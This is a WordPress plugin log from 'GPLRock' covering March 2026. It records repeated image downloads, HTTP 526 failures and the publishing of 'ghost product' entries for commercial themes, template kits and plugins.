Product ID: koka-multipurpose-woocommerce-theme [17-Mar-2026 01:10:34 UTC] GPLRock: Image download failed for product wowedding-wedding-oriented-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 01:10:36 UTC] GPLRock: Image download failed for product wowedding-wedding-oriented-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:28:46 UTC] GPLRock: Image downloaded successfully for product resta-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f66c6eba.jpg [17-Mar-2026 11:28:46 UTC] GPLRock: Using pre-downloaded image for product resta-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f66c6eba.jpg [17-Mar-2026 11:28:46 UTC] GPLRock: Ghost product published with image - Product ID: resta-restaurant-elementor-template-kit [17-Mar-2026 11:28:47 UTC] GPLRock: Image downloaded successfully for product resco-resume-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c63d16ad.webp [17-Mar-2026 11:28:47 UTC] GPLRock: Using pre-downloaded image for product resco-resume-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c63d16ad.webp [17-Mar-2026 11:28:47 UTC] GPLRock: Ghost product published with image - Product ID: resco-resume-elementor-template-kit [17-Mar-2026 11:28:48 UTC] GPLRock: Image downloaded successfully for product reparo-car-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d912c00.webp [17-Mar-2026 11:28:48 UTC] GPLRock: Using pre-downloaded image for product reparo-car-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d912c00.webp [17-Mar-2026 11:28:48 UTC] GPLRock: Ghost product published with image - Product ID: reparo-car-service-elementor-template-kit [17-Mar-2026 11:28:49 UTC] GPLRock: Image downloaded successfully for product rentive-car-rental-auto-dealer-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae22968f.jpg [17-Mar-2026 11:28:49 UTC] GPLRock: Using pre-downloaded image for product rentive-car-rental-auto-dealer-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae22968f.jpg [17-Mar-2026 11:28:49 UTC] GPLRock: Ghost product published with image - Product ID: rentive-car-rental-auto-dealer-elementor-template-kit [17-Mar-2026 11:28:51 UTC] GPLRock: Image downloaded successfully for product relife-physiotherapy-chiropractor-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d3e5fb4.webp [17-Mar-2026 11:28:51 UTC] GPLRock: Using pre-downloaded image for product relife-physiotherapy-chiropractor-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d3e5fb4.webp [17-Mar-2026 11:28:51 UTC] GPLRock: Ghost product published with image - Product ID: relife-physiotherapy-chiropractor-elementor-template-kit [17-Mar-2026 11:28:52 UTC] GPLRock: Image downloaded successfully for product relazio-public-relation-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f1d74198.jpg [17-Mar-2026 11:28:52 UTC] GPLRock: Using pre-downloaded image for product relazio-public-relation-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f1d74198.jpg [17-Mar-2026 11:28:52 UTC] GPLRock: Ghost product published with image - Product ID: relazio-public-relation-agency-elementor-template-kit [17-Mar-2026 11:28:53 UTC] GPLRock: Image downloaded successfully for product relaxa-yoga-teacher-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-891a39b8.webp [17-Mar-2026 11:28:53 UTC] GPLRock: Using pre-downloaded image for product relaxa-yoga-teacher-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-891a39b8.webp [17-Mar-2026 11:28:53 UTC] GPLRock: Ghost product published with image - Product ID: relaxa-yoga-teacher-studio-elementor-template-kit [17-Mar-2026 11:28:54 UTC] GPLRock: Image downloaded successfully for product reformoa-architecture-interior-design-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4928988a.webp [17-Mar-2026 11:28:54 UTC] GPLRock: Using pre-downloaded image for product reformoa-architecture-interior-design-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4928988a.webp [17-Mar-2026 11:28:54 UTC] GPLRock: Ghost product published with image - Product ID: reformoa-architecture-interior-design-elementor-template-kit [17-Mar-2026 11:28:55 UTC] GPLRock: Image downloaded successfully for product refix-appliance-repair-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9876498a.webp [17-Mar-2026 11:28:55 UTC] GPLRock: Using pre-downloaded image for product refix-appliance-repair-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9876498a.webp [17-Mar-2026 11:28:55 UTC] GPLRock: Ghost product published with image - Product ID: refix-appliance-repair-company-elementor-template-kit [17-Mar-2026 11:28:56 UTC] GPLRock: Image downloaded successfully for product redhelp-startup-showcase-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-52de5e6c.webp [17-Mar-2026 11:28:56 UTC] GPLRock: Using pre-downloaded image for product redhelp-startup-showcase-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-52de5e6c.webp [17-Mar-2026 11:28:56 UTC] GPLRock: Ghost product published with image - Product ID: redhelp-startup-showcase-elementor-template-kit [17-Mar-2026 11:29:03 UTC] GPLRock: Image downloaded successfully for product vets-veterinary-medical-health-clinic-wp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bbabc722.webp [17-Mar-2026 11:29:03 UTC] GPLRock: Using pre-downloaded image for product vets-veterinary-medical-health-clinic-wp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bbabc722.webp [17-Mar-2026 11:29:03 UTC] GPLRock: Ghost product published with image - Product ID: vets-veterinary-medical-health-clinic-wp-theme [17-Mar-2026 11:29:03 UTC] GPLRock: Image downloaded successfully for product kano-creative-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-85ed8c70.webp [17-Mar-2026 11:29:03 UTC] GPLRock: Using pre-downloaded image for product kano-creative-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-85ed8c70.webp [17-Mar-2026 11:29:03 UTC] GPLRock: Ghost product published with image - Product ID: kano-creative-multipurpose-wordpress-theme [17-Mar-2026 11:29:03 UTC] GPLRock: Image download failed for product antech-it-solutions-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:05 UTC] GPLRock: Image download failed for product antech-it-solutions-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/antech-it-solutions-service-wordpress-theme-21911.webp for product antech-it-solutions-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:07 UTC] GPLRock: Image download failed for product antech-it-solutions-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:09 UTC] GPLRock: Image download failed for product antech-it-solutions-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/antech-it-solutions-service-wordpress-theme-21911.webp for product antech-it-solutions-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:11 UTC] GPLRock WARNING: Image download failed for product antech-it-solutions-service-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/antech-it-solutions-service-wordpress-theme-21911.webp [17-Mar-2026 11:29:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: antech-it-solutions-service-wordpress-theme [17-Mar-2026 11:29:12 UTC] GPLRock: Image download failed for product hitboox-games-studio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:14 UTC] GPLRock: Image download failed for product hitboox-games-studio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hitboox---games-studio-wordpress-theme-30861.webp for product hitboox-games-studio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:16 UTC] GPLRock: Image download failed for product hitboox-games-studio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:18 UTC] GPLRock: Image download failed for product hitboox-games-studio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hitboox---games-studio-wordpress-theme-30861.webp for product hitboox-games-studio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:20 UTC] GPLRock WARNING: Image download failed for product hitboox-games-studio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hitboox---games-studio-wordpress-theme-30861.webp [17-Mar-2026 11:29:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hitboox-games-studio-wordpress-theme [17-Mar-2026 11:29:20 UTC] GPLRock: Image download failed for product splent-responsive-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:22 UTC] GPLRock: Image download failed for product splent-responsive-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/splent--responsive-multi-purpose-wordpress-theme-27226.webp for product splent-responsive-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:25 UTC] GPLRock: Image download failed for product splent-responsive-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:27 UTC] GPLRock: Image download failed for product splent-responsive-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/splent--responsive-multi-purpose-wordpress-theme-27226.webp for product splent-responsive-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:29 UTC] GPLRock WARNING: Image download failed for product splent-responsive-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/splent--responsive-multi-purpose-wordpress-theme-27226.webp [17-Mar-2026 11:29:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: splent-responsive-multi-purpose-wordpress-theme [17-Mar-2026 11:29:29 UTC] GPLRock: Image download failed for product creative-multipurpose-wordpress-theme-avonmore (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:31 UTC] GPLRock: Image download failed for product creative-multipurpose-wordpress-theme-avonmore (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/creative-multipurpose-wordpress-theme---avonmore-32201.webp for product creative-multipurpose-wordpress-theme-avonmore after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:33 UTC] GPLRock: Image download failed for product creative-multipurpose-wordpress-theme-avonmore (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:35 UTC] GPLRock: Image download failed for product creative-multipurpose-wordpress-theme-avonmore (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/creative-multipurpose-wordpress-theme---avonmore-32201.webp for product creative-multipurpose-wordpress-theme-avonmore after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:37 UTC] GPLRock WARNING: Image download failed for product creative-multipurpose-wordpress-theme-avonmore. URL: https://meldwp.com/wp-content/uploads/creative-multipurpose-wordpress-theme---avonmore-32201.webp [17-Mar-2026 11:29:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: creative-multipurpose-wordpress-theme-avonmore [17-Mar-2026 11:29:38 UTC] GPLRock: Image downloaded successfully for product gesto-digital-marketing-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3c8994ee.webp [17-Mar-2026 11:29:38 UTC] GPLRock: Using pre-downloaded image for product gesto-digital-marketing-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3c8994ee.webp [17-Mar-2026 11:29:38 UTC] GPLRock: Ghost product published with image - Product ID: gesto-digital-marketing-agency-wordpress-theme [17-Mar-2026 11:29:38 UTC] GPLRock: Image download failed for product lucky-magazine-and-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:40 UTC] GPLRock: Image download failed for product lucky-magazine-and-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lucky---magazine-and-blog-wordpress-theme-18044.webp for product lucky-magazine-and-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:42 UTC] GPLRock: Image download failed for product lucky-magazine-and-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:44 UTC] GPLRock: Image download failed for product lucky-magazine-and-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lucky---magazine-and-blog-wordpress-theme-18044.webp for product lucky-magazine-and-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:46 UTC] GPLRock WARNING: Image download failed for product lucky-magazine-and-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lucky---magazine-and-blog-wordpress-theme-18044.webp [17-Mar-2026 11:29:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lucky-magazine-and-blog-wordpress-theme [17-Mar-2026 11:29:50 UTC] GPLRock: Image download failed for product medizin-medical-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:52 UTC] GPLRock: Image download failed for product medizin-medical-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medizin---medical-woocommerce-theme-26692.webp for product medizin-medical-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:55 UTC] GPLRock: Image download failed for product medizin-medical-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:57 UTC] GPLRock: Image download failed for product medizin-medical-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:29:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medizin---medical-woocommerce-theme-26692.webp for product medizin-medical-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:29:59 UTC] GPLRock WARNING: Image download failed for product medizin-medical-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/medizin---medical-woocommerce-theme-26692.webp [17-Mar-2026 11:29:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: medizin-medical-woocommerce-theme [17-Mar-2026 11:29:59 UTC] GPLRock: Image download failed for product oberon-freelancer-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:30:01 UTC] GPLRock: Image download failed for product oberon-freelancer-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:30:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oberon---freelancer-portfolio-wordpress-theme-8990.webp for product oberon-freelancer-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:30:03 UTC] GPLRock: Image download failed for product oberon-freelancer-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:30:06 UTC] GPLRock: Image download failed for product oberon-freelancer-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [17-Mar-2026 11:30:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oberon---freelancer-portfolio-wordpress-theme-8990.webp for product oberon-freelancer-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [17-Mar-2026 11:30:08 UTC] GPLRock WARNING: Image download failed for product oberon-freelancer-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oberon---freelancer-portfolio-wordpress-theme-8990.webp [17-Mar-2026 11:30:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oberon-freelancer-portfolio-wordpress-theme [18-Mar-2026 01:24:43 UTC] GPLRock: Image download failed for product fox-woocommerce-currency-switcher-professional-multi-currency-woocs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:24:45 UTC] GPLRock: Image download failed for product fox-woocommerce-currency-switcher-professional-multi-currency-woocs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:24:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fox---woocommerce-currency-switcher-professional---multi-currency-woocs-19299.webp for product fox-woocommerce-currency-switcher-professional-multi-currency-woocs after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:24:47 UTC] GPLRock: Image download failed for product fox-woocommerce-currency-switcher-professional-multi-currency-woocs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:24:50 UTC] GPLRock: Image download failed for product fox-woocommerce-currency-switcher-professional-multi-currency-woocs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:24:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fox---woocommerce-currency-switcher-professional---multi-currency-woocs-19299.webp for product fox-woocommerce-currency-switcher-professional-multi-currency-woocs after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:24:52 UTC] GPLRock WARNING: Image download failed for product fox-woocommerce-currency-switcher-professional-multi-currency-woocs. URL: https://meldwp.com/wp-content/uploads/fox---woocommerce-currency-switcher-professional---multi-currency-woocs-19299.webp [18-Mar-2026 01:24:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fox-woocommerce-currency-switcher-professional-multi-currency-woocs [18-Mar-2026 01:24:52 UTC] GPLRock: Image download failed for product invoices-laravel-invoice-management-system-accounting-billing-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:24:54 UTC] GPLRock: Image download failed for product invoices-laravel-invoice-management-system-accounting-billing-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:24:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/invoices---laravel-invoice-management-system---accounting--billing-management-33299.webp for product invoices-laravel-invoice-management-system-accounting-billing-management after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:24:56 UTC] GPLRock: Image download failed for product invoices-laravel-invoice-management-system-accounting-billing-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:24:58 UTC] GPLRock: Image download failed for product invoices-laravel-invoice-management-system-accounting-billing-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/invoices---laravel-invoice-management-system---accounting--billing-management-33299.webp for product invoices-laravel-invoice-management-system-accounting-billing-management after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:25:01 UTC] GPLRock WARNING: Image download failed for product invoices-laravel-invoice-management-system-accounting-billing-management. URL: https://meldwp.com/wp-content/uploads/invoices---laravel-invoice-management-system---accounting--billing-management-33299.webp [18-Mar-2026 01:25:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: invoices-laravel-invoice-management-system-accounting-billing-management [18-Mar-2026 01:25:01 UTC] GPLRock: Image download failed for product table-rate-shipping-by-class-weight-price-quantity-volume-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:03 UTC] GPLRock: Image download failed for product table-rate-shipping-by-class-weight-price-quantity-volume-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/table-rate-shipping-by-class-weight-price-quantity--volume-for-woocommerce-14610.webp for product table-rate-shipping-by-class-weight-price-quantity-volume-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:25:05 UTC] GPLRock: Image download failed for product table-rate-shipping-by-class-weight-price-quantity-volume-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:07 UTC] GPLRock: Image download failed for product table-rate-shipping-by-class-weight-price-quantity-volume-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/table-rate-shipping-by-class-weight-price-quantity--volume-for-woocommerce-14610.webp for product table-rate-shipping-by-class-weight-price-quantity-volume-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:25:09 UTC] GPLRock WARNING: Image download failed for product table-rate-shipping-by-class-weight-price-quantity-volume-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/table-rate-shipping-by-class-weight-price-quantity--volume-for-woocommerce-14610.webp [18-Mar-2026 01:25:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: table-rate-shipping-by-class-weight-price-quantity-volume-for-woocommerce [18-Mar-2026 01:25:10 UTC] GPLRock: Image download failed for product ultimate-gdpr-compliance-jquery-toolkit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:12 UTC] GPLRock: Image download failed for product ultimate-gdpr-compliance-jquery-toolkit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-gdpr-compliance-jquery-toolkit-18078.webp for product ultimate-gdpr-compliance-jquery-toolkit after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:25:14 UTC] GPLRock: Image download failed for product ultimate-gdpr-compliance-jquery-toolkit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:16 UTC] GPLRock: Image download failed for product ultimate-gdpr-compliance-jquery-toolkit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-gdpr-compliance-jquery-toolkit-18078.webp for product ultimate-gdpr-compliance-jquery-toolkit after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:25:18 UTC] GPLRock WARNING: Image download failed for product ultimate-gdpr-compliance-jquery-toolkit. URL: https://meldwp.com/wp-content/uploads/ultimate-gdpr-compliance-jquery-toolkit-18078.webp [18-Mar-2026 01:25:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-gdpr-compliance-jquery-toolkit [18-Mar-2026 01:25:19 UTC] GPLRock: Image downloaded successfully for product forex-market-prediction-game-widget-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f8bf31c.webp [18-Mar-2026 01:25:19 UTC] GPLRock: Using pre-downloaded image for product forex-market-prediction-game-widget-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f8bf31c.webp [18-Mar-2026 01:25:19 UTC] GPLRock: Ghost product published with image - Product ID: forex-market-prediction-game-widget-wordpress-plugin [18-Mar-2026 01:25:20 UTC] GPLRock: Image download failed for product soch-social-chat-support-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:22 UTC] GPLRock: Image download failed for product soch-social-chat-support-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soch---social-chat-support-for-wordpress-21637.webp for product soch-social-chat-support-for-wordpress after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:25:24 UTC] GPLRock: Image download failed for product soch-social-chat-support-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:26 UTC] GPLRock: Image download failed for product soch-social-chat-support-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soch---social-chat-support-for-wordpress-21637.webp for product soch-social-chat-support-for-wordpress after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:25:28 UTC] GPLRock WARNING: Image download failed for product soch-social-chat-support-for-wordpress. URL: https://meldwp.com/wp-content/uploads/soch---social-chat-support-for-wordpress-21637.webp [18-Mar-2026 01:25:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: soch-social-chat-support-for-wordpress [18-Mar-2026 01:25:29 UTC] GPLRock: Image download failed for product grammar-matters-automatic-grammar-checker-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:31 UTC] GPLRock: Image download failed for product grammar-matters-automatic-grammar-checker-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grammar-matters---automatic-grammar-checker-plugin-for-wordpress-20433.webp for product grammar-matters-automatic-grammar-checker-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:25:33 UTC] GPLRock: Image download failed for product grammar-matters-automatic-grammar-checker-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:35 UTC] GPLRock: Image download failed for product grammar-matters-automatic-grammar-checker-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 01:25:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grammar-matters---automatic-grammar-checker-plugin-for-wordpress-20433.webp for product grammar-matters-automatic-grammar-checker-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 01:25:37 UTC] GPLRock WARNING: Image download failed for product grammar-matters-automatic-grammar-checker-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/grammar-matters---automatic-grammar-checker-plugin-for-wordpress-20433.webp [18-Mar-2026 01:25:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grammar-matters-automatic-grammar-checker-plugin-for-wordpress [18-Mar-2026 01:25:38 UTC] GPLRock: Image downloaded successfully for product woocommerce-nft-importer-data-fetcher-via-cronjob-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-57d5dbb4.webp [18-Mar-2026 04:41:14 UTC] GPLRock: Image download failed for product levita-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:16 UTC] GPLRock: Image download failed for product levita-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/levita---photography-wordpress-theme-8340.webp for product levita-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:41:18 UTC] GPLRock: Image download failed for product levita-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:20 UTC] GPLRock: Image download failed for product levita-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/levita---photography-wordpress-theme-8340.webp for product levita-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:41:23 UTC] GPLRock WARNING: Image download failed for product levita-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/levita---photography-wordpress-theme-8340.webp [18-Mar-2026 04:41:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: levita-photography-wordpress-theme [18-Mar-2026 04:41:27 UTC] GPLRock: 